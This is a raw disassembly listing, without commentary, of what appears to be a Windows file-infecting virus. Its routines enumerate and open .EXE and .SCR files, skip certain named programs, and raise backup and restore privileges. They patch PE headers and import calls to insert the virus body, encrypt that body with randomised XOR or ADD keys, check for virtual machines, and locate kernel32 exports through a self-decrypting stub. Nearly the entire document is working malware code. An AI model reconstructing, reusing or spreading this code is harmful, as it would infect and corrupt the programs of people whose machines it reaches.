test dword ptr [ebp+1039B0h], 40h
jz short loc_3142BF4D
neg eax
loc_3142BF4D: ; CODE XREF: .gda_:3142BF49�j
stosd
retn 4
; =============== S U B R O U T I N E =======================================
sub_3142BF51 proc near ; CODE XREF: sub_3142C4BB+336�p
push esi
push edi
cmp dword ptr [ebp+1042F0h], 0
jz loc_3142C139
call near ptr loc_3142BF71+1
dec ebx
inc ebp
push edx
dec esi
inc ebp
dec esp
xor esi, [edx]
db 2Eh
inc esp
dec esp
dec esp
loc_3142BF71: ; CODE XREF: sub_3142BF51+F�p
add bh, bh
sub_3142BF51 endp ; sp-analysis failed
xchg eax, ebp
sahf
db 3Eh
adc [eax], al
mov [ebp+104304h], eax
push ebx
mov ebx, [eax+3Ch]
add ebx, eax
push dword ptr [ebx+28h]
mov eax, [ebx+34h]
call sub_3142B474
mov edx, [ebp+1042E4h]
pop ebx
add eax, [edx+0Ch]
mov [ebp+104308h], eax
add eax, [edx+8]
mov [ebp+10430Ch], eax
mov esi, [ebx+28h]
push dword ptr [ebx+80h]
call sub_3142B474
mov edi, [ebp+1042E4h]
push esi
call sub_3142B474
mov edx, [ebp+1042E4h]
mov ecx, [edx+8]
add ecx, [edx+0Ch]
sub ecx, esi
sub ecx, 5
js loc_3142C139
jz loc_3142C139
add esi, [ebp+1042E8h]
add esi, [ebp+1042A4h]
; START OF FUNCTION CHUNK FOR sub_3142C10A
loc_3142BFEB: ; CODE XREF: sub_3142C10A+29�j
lodsb
cmp al, 0E8h
jnz loc_3142C096
lea eax, [esi+4]
sub eax, [ebp+1042A4h]
add eax, [esi]
push eax
call sub_3142B474
cmp dword ptr [ebp+1042E4h], 0
jnz short loc_3142C019
cmp eax, [edi+0Ch]
jnb loc_3142C132
jmp short loc_3142C025
; ---------------------------------------------------------------------------
loc_3142C019: ; CODE XREF: sub_3142C10A-FE�j
cmp [ebp+1042E4h], edx
jnz loc_3142C132
loc_3142C025: ; CODE XREF: sub_3142C10A-F3�j
add eax, [ebp+1042A4h]
cmp word ptr [eax], 25FFh
jnz loc_3142C132
mov eax, [eax+2]
sub eax, [ebx+34h]
push eax
call sub_3142B474
cmp [ebp+1042E4h], edi
jnz loc_3142C132
add eax, [ebp+1042E8h]
add eax, [ebp+1042A4h]
mov eax, [eax]
sub eax, [edi+0Ch]
jb loc_3142C132
cmp eax, [edi+8]
jnb loc_3142C132
loc_3142C06E: ; CODE XREF: sub_3142C10A+22�j
add eax, 2
add eax, [edi+14h]
add eax, [ebp+1042A4h]
push edx
push eax
push dword ptr [ebp+104304h]
call dword ptr [ebp+103E5Eh]
pop edx
test eax, eax
jnz loc_3142C148
jmp loc_3142C132
; ---------------------------------------------------------------------------
loc_3142C096: ; CODE XREF: sub_3142C10A-11C�j
cmp al, 0FFh
jnz loc_3142C132
cmp byte ptr [esi], 15h
jnz loc_3142C132
mov eax, [esi+1]
sub eax, [ebx+34h]
push eax
call sub_3142B474
cmp [ebp+1042E4h], edi
jnz short loc_3142C132
add eax, [ebp+1042E8h]
add eax, [ebp+1042A4h]
mov [ebp+104310h], eax
mov eax, [eax]
cmp eax, [ebp+104308h]
jb short loc_3142C0DF
cmp eax, [ebp+10430Ch]
jb short loc_3142C148
loc_3142C0DF: ; CODE XREF: sub_3142C10A-35�j
cmp eax, 70000000h
jb short loc_3142C11D
call sub_3142C10A
lea ecx, [esi-4]
mov eax, ecx
sub eax, [edx]
add eax, [edx+10h]
cmp eax, [ebp+104310h]
jnz short locret_3142C109
add esp, 10h
push dword ptr [ecx]
pop [esp-0Ch+arg_24]
popa
jmp short loc_3142C124
; ---------------------------------------------------------------------------
locret_3142C109: ; CODE XREF: sub_3142C10A-F�j
retn
; END OF FUNCTION CHUNK FOR sub_3142C10A
; =============== S U B R O U T I N E =======================================
sub_3142C10A proc near ; CODE XREF: sub_3142C10A-24�p
var_8 = dword ptr -8
arg_0 = dword ptr 4
arg_24 = dword ptr 28h
; FUNCTION CHUNK AT 3142BFEB SIZE 0000011F BYTES
pop dword ptr [ebp+1042C4h]
pusha
mov esi, [ebp+1042A4h]
call sub_3142B57B
popa
loc_3142C11D: ; CODE XREF: sub_3142C10A-26�j
test eax, 80000000h
jnz short loc_3142C132
loc_3142C124: ; CODE XREF: sub_3142C10A-3�j
sub eax, [edi+0Ch]
jb short loc_3142C132
cmp eax, [edi+8]
jb loc_3142C06E
loc_3142C132: ; CODE XREF: sub_3142C10A-F9�j
; sub_3142C10A-EB�j ...
dec ecx
jnz loc_3142BFEB
loc_3142C139: ; CODE XREF: sub_3142BF51+9�j
; .gda_:3142BFD3�j ...
mov edi, [esp-4+arg_0]
and dword ptr [edi+29B0h], 0FFBFFFFFh
jmp short loc_3142C18A
; ---------------------------------------------------------------------------
loc_3142C148: ; CODE XREF: sub_3142C10A-7F�j
; sub_3142C10A-2D�j
or dword ptr [edx+24h], 0E0000060h
dec esi
xor eax, eax
mov ecx, [esp+8+var_8]
xchg eax, [ebp+1042F0h]
mov [ebp+1042ECh], eax
lea edi, [ecx+29B4h]
add eax, [ebp+1042A4h]
movsw
movsd
dec esi
sub eax, esi
add eax, [edx+14h]
sub eax, [edx+0Ch]
mov byte ptr [esi-5], 0E8h
mov dword ptr [ecx+54h], 5
mov [esi-4], eax
loc_3142C18A: ; CODE XREF: sub_3142C10A+3C�j
pop edi
pop esi
retn
sub_3142C10A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142C18D proc near ; CODE XREF: .gda_:3142C48E�p
; FUNCTION CHUNK AT 3142C2B7 SIZE 00000002 BYTES
push edi
call dword ptr [ebp+103EAAh]
shr eax, 1Fh
jnz loc_3142C2B7
push eax
push esp
push 28h
push 0FFFFFFFFh
call dword ptr [ebp+103F0Ah]
test eax, eax
pop edi
js loc_3142C2B7
call sub_3142A60F
call near ptr loc_3142C1C8+5
push ebx
db 65h
jz short near ptr unk_3142C206
imul ebp, [ebp+53h], 72756365h
loc_3142C1C8: ; CODE XREF: sub_3142C18D+2A�p
imul esi, [ecx+edi*2+41h], 78B5FF00h
sub_3142C18D endp ; sp-analysis failed
inc edx
adc [eax], al
call dword ptr [ebp+103E5Eh]
mov [ebp+104280h], eax
call near ptr loc_3142C1FC+1
push ebx
db 65h
push esp
popa
imul esp, [ebp+4Fh], 77h
outsb
db 65h
jb short loc_3142C263
push 72507069h
imul esi, [esi+69h], 6567656Ch
loc_3142C1FC: ; CODE XREF: .gda_:3142C1DF�p
add [edi-18h], dl
sub eax, ebp
; ---------------------------------------------------------------------------
db 0FFh
db 0FFh
db 0E8h ; è
db 13h
db 0
unk_3142C206 db 0 ; CODE XREF: sub_3142C18D+30�j
db 0
db 53h ; S
db 65h ; e
db 52h ; R
db 65h ; e
db 73h ; s
db 74h ; t
db 6Fh ; o
db 72h ; r
db 65h ; e
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0Bh
db 0E8h ; è
db 0FFh
db 0FFh
db 0E8h ; è
db 12h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 42h ; B
db 61h ; a
db 63h ; c
db 6Bh ; k
db 75h ; u
db 70h ; p
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0EEh ; î
db 0E7h ; ç
db 0FFh
db 0FFh
db 0E8h ; è
db 18h
db 0
db 0
db 0
db 53h ; S
db 65h ; e
db 43h ; C
db 68h ; h
db 61h ; a
db 6Eh ; n
db 67h ; g
db 65h ; e
db 4Eh ; N
db 6Fh ; o
db 74h ; t
db 69h ; i
db 66h ; f
db 79h ; y
db 50h ; P
db 72h ; r
db 69h ; i
db 76h ; v
db 69h ; i
db 6Ch ; l
db 65h ; e
db 67h ; g
db 65h ; e
db 0
db 57h ; W
db 0E8h ; è
db 0CBh ; Ë
db 0E7h ; ç
db 0FFh
db 0FFh
db 50h ; P
db 54h ; T
; ---------------------------------------------------------------------------
loc_3142C263: ; CODE XREF: .gda_:3142C1ED�j
lea eax, [ebp+103DBCh]
push 64h
push eax
push 1
push edi
call dword ptr [ebp+103F16h]
mov [esp], edi
call dword ptr [ebp+103E52h]
sub al, al
lea edi, [ebp+104174h]
push eax
push eax
push eax
push dword ptr [ebp+103DBCh]
push 40001h
push esp
push 1
push edi
call dword ptr [ebp+104280h]
push esp
push 4
push edi
call dword ptr [ebp+104280h]
add esp, 14h
push dword ptr [ebp+104278h]
call dword ptr [ebp+103E8Eh]
; START OF FUNCTION CHUNK FOR sub_3142C18D
loc_3142C2B7: ; CODE XREF: sub_3142C18D+A�j
; sub_3142C18D+1F�j
pop edi
retn
; END OF FUNCTION CHUNK FOR sub_3142C18D
; =============== S U B R O U T I N E =======================================
sub_3142C2B9 proc near ; CODE XREF: .gda_:3142C487�p
; .gda_:3142C493�p ...
lea esi, [ebp+104174h]
push esi
call dword ptr [ebp+103E92h]
cmp eax, 0FFFFFFFFh
jz locret_3142C38A
mov [ebp+104284h], eax
push 0
push esi
call dword ptr [ebp+103ECEh]
test eax, eax
jz locret_3142C38A
sub eax, eax
push eax
push eax
push 3
push eax
push 1
push 0C0000000h
push esi
call dword ptr [ebp+103E6Eh]
cmp eax, 0FFFFFFFFh
jz loc_3142C90B
mov [ebp+104288h], eax
lea ecx, [ebp+10428Ch]
lea edx, [ebp+104294h]
push ecx
push edx
push 0
push eax
call dword ptr [ebp+103E9Ah]
cmp eax, 0FFFFFFFFh
jz loc_3142C8FF
push 0
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E96h]
cmp eax, 0FFFFFFFFh
jz loc_3142C8FF
mov [ebp+10429Ch], eax
xor ecx, ecx
add eax, ebx
push ecx
push eax
push ecx
push 4
push ecx
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E72h]
test eax, eax
jz loc_3142C8FF
xor ecx, ecx
mov [ebp+1042A0h], eax
push ecx
push ecx
push ecx
push 0F001Fh
push eax
call dword ptr [ebp+103EBAh]
test eax, eax
jz loc_3142C8D7
mov [ebp+1042A4h], eax
locret_3142C38A: ; CODE XREF: sub_3142C2B9+10�j
; sub_3142C2B9+27�j ...
retn
sub_3142C2B9 endp
; ---------------------------------------------------------------------------
loc_3142C38B: ; CODE XREF: sub_3142C4BB+188�p
; sub_3142C4BB+2A0�p
mov eax, 7317h
mov ecx, [ebx+38h]
; ---------------------------------------------------------------------------
db 0F7h ; ÷
db 85h ; …
db 0B0h ; °
db 39h ; 9
db 10h
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
and [ebp+6], dh
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042B0h], eax
mov eax, 29BBh
mov ecx, [ebx+3Ch]
add eax, [ebp+101069h]
xor edx, edx
add eax, ecx
div ecx
mul ecx
mov [ebp+1042A8h], eax
retn
; =============== S U B R O U T I N E =======================================
sub_3142C3D0 proc near ; CODE XREF: sub_3142C4BB:loc_3142C530�p
; sub_3142C4BB+1B4�p
movzx ecx, word ptr [ebx+6]
stc
loc_3142C3D5: ; CODE XREF: sub_3142C3D0+23�j
jecxz short locret_3142C40C
lea edx, [ebx+18h]
movzx eax, word ptr [ebx+14h]
add edx, eax
dec ecx
imul eax, ecx, 28h
add edx, eax
cmp dword ptr [edx], 6E69775Fh
stc
jz short locret_3142C40C
cmp dword ptr [edx+0Ch], 1
jb short loc_3142C3D5
mov ecx, [ebx+3Ch]
mov eax, [edx+14h]
add eax, [edx+10h]
lea eax, [eax+ecx*2-1]
neg ecx
and eax, ecx
cmp eax, [ebp+10429Ch]
locret_3142C40C: ; CODE XREF: sub_3142C3D0:loc_3142C3D5�j
; sub_3142C3D0+1D�j ...
retn
sub_3142C3D0 endp
; =============== S U B R O U T I N E =======================================
sub_3142C40D proc near ; CODE XREF: .gda_:3142C4A5�p
arg_C = dword ptr 10h
mov edx, [esp+arg_C]
xor eax, eax
pop dword ptr [edx+0B8h]
retn
sub_3142C40D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_3142C41A: ; CODE XREF: .gda_:3142C43B�j
mov ecx, edi
jmp short loc_3142C429
; ---------------------------------------------------------------------------
lea edi, [ebp+104174h]
cld
loc_3142C425: ; CODE XREF: .gda_:3142C437�j
mov ebx, edi
xor ecx, ecx
loc_3142C429: ; CODE XREF: .gda_:3142C41C�j
; .gda_:3142C43F�j
lodsb
cmp al, 61h
jb short loc_3142C434
cmp al, 7Ah
ja short loc_3142C434
sub al, 20h
loc_3142C434: ; CODE XREF: .gda_:3142C42C�j
; .gda_:3142C430�j
stosb
cmp al, 5Ch
jz short loc_3142C425
cmp al, 2Eh
jz short loc_3142C41A
cmp al, 0
jnz short loc_3142C429
jecxz short locret_3142C40C
mov eax, [ecx]
cmp eax, 455845h
jz short loc_3142C457
cmp eax, 524353h
jnz locret_3142C38A
loc_3142C457: ; CODE XREF: .gda_:3142C44A�j
mov eax, [ebx]
cmp eax, 434E4957h
jz locret_3142C38A
cmp eax, 4E554357h
jz locret_3142C38A
cmp eax, 32334357h
jz locret_3142C38A
cmp eax, 4F545350h
jz locret_3142C38A
xor ebx, ebx
call sub_3142C2B9
jnz short loc_3142C49E
call sub_3142C18D
call sub_3142C2B9
jz locret_3142C38A
loc_3142C49E: ; CODE XREF: .gda_:3142C48C�j
xor edx, edx
call sub_3142C4BB
call sub_3142C40D
call $+5
pop ebp
sub ebp, 10343Fh
jmp loc_3142C8B5
; =============== S U B R O U T I N E =======================================
sub_3142C4BB proc near ; CODE XREF: .gda_:3142C4A0�p
var_14 = dword ptr -14h
push dword ptr fs:[edx]
mov esi, [ebp+1042A4h]
mov fs:[edx], esp
cmp word ptr [esi], 5A4Dh
jnz loc_3142C8B5
mov ebx, [esi+3Ch]
add ebx, esi
cmp word ptr [ebx], 4550h
jnz loc_3142C8B5
test dword ptr [ebx+16h], 2000h
jnz loc_3142C8B5
test byte ptr [ebx+5Ch], 2
jz loc_3142C8B5
mov eax, [ebx+8]
cmp eax, 0A0A0A0A0h
jz loc_3142C8B5
cmp eax, 20202020h
jz loc_3142C8B5
mov ecx, [ebx+0C8h]
jecxz short loc_3142C530
push ecx
call sub_3142B474
add ecx, [ebp+1042E8h]
add ecx, esi
and dword ptr [ecx+40h], 0
and dword ptr [ecx+44h], 0
loc_3142C530: ; CODE XREF: sub_3142C4BB+5D�j
call sub_3142C3D0
jb loc_3142C8B5
and dword ptr [ebp+1042ECh], 0
mov eax, [edx+8]
mov ecx, [edx+10h]
sub eax, ecx
jnb short loc_3142C550
xor eax, eax
jmp short loc_3142C555
; ---------------------------------------------------------------------------
loc_3142C550: ; CODE XREF: sub_3142C4BB+8F�j
add ecx, eax
mov [edx+10h], ecx
loc_3142C555: ; CODE XREF: sub_3142C4BB+93�j
mov [ebp+1042ACh], eax
add ecx, [edx+0Ch]
mov eax, 10000h
push ecx
call near ptr dword_3142ABB0+43h
xor [ebp+1039AEh], dl
mov cl, 20h
xor [ebp+1039AFh], dh
loc_3142C577: ; CODE XREF: sub_3142C4BB+D5�j
push 20h
dec cl
pop eax
js short loc_3142C592
call near ptr dword_3142ABB0+43h
test edx, edx
setz dl
shl edx, cl
xor [ebp+1039B0h], edx
jmp short loc_3142C577
; ---------------------------------------------------------------------------
loc_3142C592: ; CODE XREF: sub_3142C4BB+C1�j
test dword ptr [ebp+1039B0h], 2000000h
jz short loc_3142C5C0
test dword ptr [ebp+1039B0h], 3
jnz short loc_3142C5B6
and dword ptr [ebp+1039B0h], 0F7FFFFFFh
jmp short loc_3142C5C0
; ---------------------------------------------------------------------------
loc_3142C5B6: ; CODE XREF: sub_3142C4BB+ED�j
or dword ptr [ebp+1039B0h], 10000000h
loc_3142C5C0: ; CODE XREF: sub_3142C4BB+E1�j
; sub_3142C4BB+F9�j ...
push 6
pop ecx
loc_3142C5C6: ; CODE XREF: sub_3142C4BB+129�j
push 6
pop eax
call near ptr dword_3142ABB0+43h
mov al, [ebp+1039A8h]
xchg al, [edx+ebp+1039A8h]
mov [ebp+1039A8h], al
loop loc_3142C5C6
test dword ptr [ebp+1039B0h], 8
jnz short loc_3142C5FB
cmp byte ptr [ebp+1039AAh], 1
jz short loc_3142C5C0
loc_3142C5FB: ; CODE XREF: sub_3142C4BB+135�j
test dword ptr [ebp+1039B0h], 10000000h
jz short loc_3142C622
cmp byte ptr [ebp+1039A8h], 5
jz short loc_3142C5C0
cmp byte ptr [ebp+1039A9h], 5
jz short loc_3142C5C0
cmp byte ptr [ebp+1039AAh], 5
jz short loc_3142C5C0
loc_3142C622: ; CODE XREF: sub_3142C4BB+14A�j
test dword ptr [ebp+1039B0h], 400000h
jz short loc_3142C637
cmp byte ptr [ebp+1039A8h], 2
ja short loc_3142C5C0
loc_3142C637: ; CODE XREF: sub_3142C4BB+171�j
and dword ptr [ebp+1042F0h], 0
call loc_3142B8B5
call loc_3142C38B
call sub_3142C8BE
mov ebx, [ebp+1042A8h]
add ebx, [ebp+1042ACh]
call sub_3142C2B9
jz loc_3142C8B5
mov esi, [ebp+1042A4h]
mov ebx, [esi+3Ch]
add ebx, esi
call sub_3142C3D0
jb loc_3142C8B5
or dword ptr [edx+24h], 0E0000060h
mov edi, esi
push edx
push esi
add edi, [edx+14h]
add edi, [edx+10h]
test dword ptr [ebp+1039B0h], 20000000h
jnz short loc_3142C6AB
mov [ebp+1042F4h], edi
lea esi, [ebp+1039BCh]
mov ecx, [ebp+101069h]
rep movsb
loc_3142C6AB: ; CODE XREF: sub_3142C4BB+1DA�j
push edi
mov ecx, 0A6Fh
lea esi, [ebp+101000h]
rep movsd
mov cl, 0
jecxz short loc_3142C6BF
rep movsb
loc_3142C6BF: ; CODE XREF: sub_3142C4BB+200�j
test dword ptr [ebp+1039B0h], 20000000h
jz loc_3142C77D
push dword ptr [ebx+28h]
call sub_3142B474
mov edx, [ebp+1042E4h]
test edx, edx
jz loc_3142C77D
mov esi, [ebp+1042A4h]
mov ecx, [edx+10h]
or dword ptr [edx+24h], 0E0000060h
sub ecx, [edx+8]
jnb short loc_3142C6FC
xor ecx, ecx
loc_3142C6FC: ; CODE XREF: sub_3142C4BB+23D�j
add esi, [edx+14h]
cmp ecx, [ebp+101069h]
mov ecx, [ebp+101069h]
jb short loc_3142C763
mov edi, [esp+14h+var_14]
and dword ptr [ebp+101069h], 0
and dword ptr [edi+69h], 0
mov edi, [edx+8]
add [edx+8], ecx
add esi, edi
xchg esi, edi
mov eax, [ebp+1042B8h]
test dword ptr [ebp+1039B0h], 40h
jz short loc_3142C73C
neg dword ptr [eax]
loc_3142C73C: ; CODE XREF: sub_3142C4BB+27D�j
add esi, [edx+0Ch]
sub [eax], esi
mov [ebp+1042F0h], esi
mov esi, [ebx+28h]
add [eax], esi
test dword ptr [ebp+1039B0h], 40h
jz short loc_3142C75A
neg dword ptr [eax]
loc_3142C75A: ; CODE XREF: sub_3142C4BB+29B�j
push ecx
call loc_3142C38B
pop ecx
jmp short loc_3142C76F
; ---------------------------------------------------------------------------
loc_3142C763: ; CODE XREF: sub_3142C4BB+250�j
add esi, [ebx+28h]
sub esi, [edx+0Ch]
push ecx
push esi
rep movsb
pop edi
pop ecx
loc_3142C76F: ; CODE XREF: sub_3142C4BB+2A6�j
lea esi, [ebp+1039BCh]
mov [ebp+1042F4h], edi
rep movsb
loc_3142C77D: ; CODE XREF: sub_3142C4BB+20E�j
; sub_3142C4BB+224�j
pop edi
pop esi
rdtsc
xchg eax, edx
lea eax, [edi+137h]
cmp dl, [ebp+1039AEh]
jnz short loc_3142C796
imul edx, 12345678h
loc_3142C796: ; CODE XREF: sub_3142C4BB+2D3�j
mov [eax-19h], dx
call sub_3142A190
pop edx
mov ecx, [edx+0Ch]
add ecx, [edx+10h]
test dword ptr [ebp+1039B0h], 20000000h
lea eax, [ecx+5]
jnz short loc_3142C7C8
mov [ebp+1042F0h], ecx
add eax, [ebp+101069h]
and dword ptr [edi+69h], 0
loc_3142C7C8: ; CODE XREF: sub_3142C4BB+2F8�j
sub eax, [ebx+28h]
mov [edi+54h], eax
test dword ptr [ebp+103F6Ch], 1
jz short loc_3142C7E4
mov dword ptr [ebx+8], 0A0A0A0A0h
loc_3142C7E4: ; CODE XREF: sub_3142C4BB+320�j
test dword ptr [ebp+1039B0h], 400000h
jz short loc_3142C7F7
push edx
call sub_3142BF51
pop edx
loc_3142C7F7: ; CODE XREF: sub_3142C4BB+333�j
mov ecx, [ebp+1042F0h]
jecxz short loc_3142C804
mov [ebx+28h], ecx
jmp short loc_3142C811
; ---------------------------------------------------------------------------
loc_3142C804: ; CODE XREF: sub_3142C4BB+342�j
mov ecx, [ebp+1042ECh]
jecxz short loc_3142C80E
jmp short loc_3142C811
; ---------------------------------------------------------------------------
loc_3142C80E: ; CODE XREF: sub_3142C4BB+34F�j
mov ecx, [ebx+28h]
loc_3142C811: ; CODE XREF: sub_3142C4BB+347�j
; sub_3142C4BB+351�j
test dword ptr [ebp+1039B0h], 3
jz short loc_3142C831
mov eax, [ebp+1042F4h]
add ecx, [ebp+1042DCh]
add eax, [ebp+1042D8h]
add [eax], ecx
loc_3142C831: ; CODE XREF: sub_3142C4BB+360�j
mov ecx, [edx+10h]
mov eax, [ebp+1042A8h]
cmp [edx+8], ecx
jnb short loc_3142C842
mov [edx+8], ecx
loc_3142C842: ; CODE XREF: sub_3142C4BB+382�j
add [edx+10h], eax
and dword ptr [ebx+58h], 0
mov eax, [ebp+1042B0h]
push 29BCh
add [edx+8], eax
pop ecx
add [ebx+50h], eax
mov dl, [ebp+1039AEh]
test dword ptr [ebp+1039B0h], 20000000h
jz short loc_3142C873
add ecx, [ebp+101069h]
loc_3142C873: ; CODE XREF: sub_3142C4BB+3B0�j
mov dh, 0
test dword ptr [ebp+1039B0h], 20000h
jnz short loc_3142C895
inc dh
test dword ptr [ebp+1039B0h], 40000h
jnz short loc_3142C895
mov dh, [ebp+1039AFh]
loc_3142C895: ; CODE XREF: sub_3142C4BB+3C4�j
; sub_3142C4BB+3D2�j
test dword ptr [ebp+1039B0h], 4000h
jnz short loc_3142C8AC
loc_3142C8A1: ; CODE XREF: sub_3142C4BB+3ED�j
mov al, [edi]
add al, dl
stosb
add dl, dh
loop loc_3142C8A1
jmp short loc_3142C8B5
; ---------------------------------------------------------------------------
loc_3142C8AC: ; CODE XREF: sub_3142C4BB+3E4�j
; sub_3142C4BB+3F8�j
mov al, [edi]
xor al, dl
stosb
add dl, dh
loop loc_3142C8AC
loc_3142C8B5: ; CODE XREF: .gda_:3142C4B6�j
; sub_3142C4BB+11�j ...
xor edx, edx
mov esp, fs:[edx]
pop dword ptr fs:[edx]
pop eax
sub_3142C4BB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3142C8BE proc near ; CODE XREF: sub_3142C4BB+18D�p
cmp dword ptr [ebp+104288h], 0
jz locret_3142C38A
push dword ptr [ebp+1042A4h]
call dword ptr [ebp+103EDEh]
loc_3142C8D7: ; CODE XREF: sub_3142C2B9+C5�j
push dword ptr [ebp+1042A0h]
call dword ptr [ebp+103E52h]
lea ecx, [ebp+10428Ch]
lea edx, [ebp+104294h]
push ecx
push edx
push 0
push dword ptr [ebp+104288h]
call dword ptr [ebp+103ED2h]
loc_3142C8FF: ; CODE XREF: sub_3142C2B9+6B�j
; sub_3142C2B9+82�j ...
push dword ptr [ebp+104288h]
call dword ptr [ebp+103E52h]
loc_3142C90B: ; CODE XREF: sub_3142C2B9+45�j
lea esi, [ebp+104174h]
push dword ptr [ebp+104284h]
push esi
call dword ptr [ebp+103ECEh]
and dword ptr [ebp+104288h], 0
retn
sub_3142C8BE endp
; ---------------------------------------------------------------------------
dw 0E8h
dd 5D000000h, 0ED81016Ah, 1038BBh, 0C10FF058h, 10157885h
dd 0C3C08500h, 0F0FFC883h, 7885C10Fh, 0C3001015h, 2A00103Dh
dd 661C7500h, 0C247C81h, 1375716Ch, 0FFC4E860h, 575FFFFh
dd 0FFFAB5E8h, 0FFD2E8FFh, 2E61FFFFh, 56782DFFh, 25B81234h
dd 60000000h, 0FFFFA5E8h, 8B3975FFh, 8D302444h, 104174B5h
dd 8508B00h, 63A8166h, 56257302h, 0FF000068h, 6AC48B00h
dd 0FF505200h, 103F1E95h, 8C48300h, 3F5C3E81h, 3755C3Fh
dd 0E804C683h, 0FFFFFA62h, 0FFFF7FE8h, 0B8C361FFh, 74h
dd 2FB8B1EBh, 0E8000000h, 1Dh, 0B80020C2h, 30h, 10E8h
dd 24C200h, 185B8h, 3E800h, 2CC20000h, 24548D00h, 832ECD0Ch
dd 197C00F8h, 0E860h, 548B0000h, 8B5D3024h, 92ED811Ah
dd 0E8001039h, 0FFFFE0B3h, 4C261h, 5030701h, 0F21D0602h
dd 98AD4144h, 119415FFh, 0FF8B0100h, 125h dup(0)
dd 79630000h, 37DE77E7h, 157D77E7h, 77F5h, 126h dup(0)
dd 29D9h, 1325h dup(0)
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_4 = dword ptr -4
arg_101118 = byte ptr 101120h
arg_10112F = byte ptr 101137h
arg_1039A8 = dword ptr 1039B0h
arg_1039AC = byte ptr 1039B4h
arg_1039B4 = byte ptr 1039BCh
arg_103E4A = dword ptr 103E52h
arg_103E4E = dword ptr 103E56h
arg_1042F0 = dword ptr 1042F8h
arg_1042F4 = dword ptr 1042FCh
arg_1042F8 = dword ptr 104300h
; FUNCTION CHUNK AT 3143207B SIZE 00000118 BYTES
; FUNCTION CHUNK AT 314321AC SIZE 00000047 BYTES
cld
cld
push ebp
mov ebp, esp
xchg ebx, ebx
sub eax, eax
loc_3143200A: ; CODE XREF: start+F�j
dec al
or al, al
jz short loc_31432014
jnz short loc_3143200A
jmp short loc_3143207B
; ---------------------------------------------------------------------------
loc_31432014: ; CODE XREF: start+D�j
cld
mov ecx, ecx
clc
stc
nop
nop
sub ebx, ebx
sub ecx, ecx
cld
cld
mov cl, 57h
cld
xchg ebx, ebx
nop
loc_31432027: ; CODE XREF: start+2B�j
lea ebx, [ebx+1]
xchg ebx, ebx
loop loc_31432027
xchg ebx, ebx
clc
call sub_31432046
stc
nop
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_31432038 proc near ; CODE XREF: sub_31432046:loc_31432059�p
mov al, [esi]
clc
xor ax, bx
cmc
nop
xchg al, [esi]
retn
sub_31432038 endp
; ---------------------------------------------------------------------------
jmp short $+2
cld
; =============== S U B R O U T I N E =======================================
sub_31432046 proc near ; CODE XREF: start+30�p
pop esi
jmp short $+2
sub esi, 0FFFFFFC1h
push esi
mov edi, 29BCh
stc
mov eax, eax
clc
loc_31432059: ; CODE XREF: sub_31432046+23�j
call sub_31432038
cmc
add esi, 1
inc ebx
dec edi
jmp short $+2
cmp edi, 0
jnz short loc_31432059
pop esi
stc
leave
clc
jmp esi
sub_31432046 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
clc
mov ecx, ecx
clc
call $+5
cld
; START OF FUNCTION CHUNK FOR start
loc_3143207B: ; CODE XREF: start+11�j
mov eax, [esp+0]
mov ecx, [eax+29ABh]
mov [eax+32F3h], ebx
and ecx, 400000h
mov ebx, [esp+4]
jz short loc_314320C2
pop ecx
mov [eax+32F7h], esi
mov cl, [eax+29AFh]
mov [eax+32FBh], edi
cmp cl, 0E8h
jz short loc_314320B6
mov ebx, [eax+29B1h]
jmp short loc_314320C0
; ---------------------------------------------------------------------------
loc_314320B6: ; CODE XREF: start+AB�j
mov ecx, [eax+29B0h]
mov ebx, [ecx+ebx+2]
loc_314320C0: ; CODE XREF: start+B3�j
mov ebx, [ebx]
loc_314320C2: ; CODE XREF: start+93�j
push ebp
mov ebp, eax
sub dword ptr [esp+4], 8079h
sub ebp, 101005h
mov edi, [esp+4]
lea esi, [ebp+arg_1039B4]
mov ecx, 0
rep movsb
sldt cx
test ecx, ecx
jnz short loc_314320F0
or eax, 0FFFFFFFFh
int 2Eh ; DOS 2+ internal - EXECUTE COMMAND
; DS:SI -> counted CR-terminated command string
loc_314320F0: ; CODE XREF: start+E8�j
and ebx, 0FFFFF000h
loc_314320F6: ; CODE XREF: start+104�j
cmp dword ptr [ebx+4Eh], 73696854h
jz short loc_31432107
loc_314320FF: ; CODE XREF: start+113�j
sub ebx, 100h
jnz short loc_314320F6
loc_31432107: ; CODE XREF: start+FC�j
mov eax, ebx
add eax, [ebx+3Ch]
mov edx, [eax+78h]
cmp word ptr [eax], 4550h
jnz short loc_314320FF
add edx, ebx
mov esi, [edx+20h]
mov ecx, [edx+18h]
add esi, ebx
push ecx
loc_31432121: ; CODE XREF: start:loc_31432135�j
lodsd
add eax, ebx
cmp word ptr [eax+2], 5074h
jnz short loc_31432135
cmp dword ptr [eax+5], 6441636Fh
jz short loc_3143213A
loc_31432135: ; CODE XREF: start+129�j
loop loc_31432121
pop ecx
jmp short loc_31432165
; ---------------------------------------------------------------------------
loc_3143213A: ; CODE XREF: start+132�j
sub [esp+4+var_4], ecx
mov esi, [edx+24h]
pop ecx
add esi, ebx
movzx eax, word ptr [esi+ecx*2]
mov edi, [edx+1Ch]
add edi, ebx
mov esi, [edi+eax*4]
add esi, ebx
lea eax, [ebp+arg_10112F]
lea ecx, [ebp+arg_101118]
mov dx, [eax-19h]
call ecx
jmp short loc_314321AC
; ---------------------------------------------------------------------------
loc_31432165: ; CODE XREF: start+137�j
; sub_314321F3+10�j ...
mov eax, [ebp+arg_1039A8]
and eax, 400000h
jz short loc_31432191
lea esi, [ebp+arg_1039AC]
lodsd
mov edi, [esp+4]
stosd
mov ebx, [ebp+arg_1042F0]
movsb
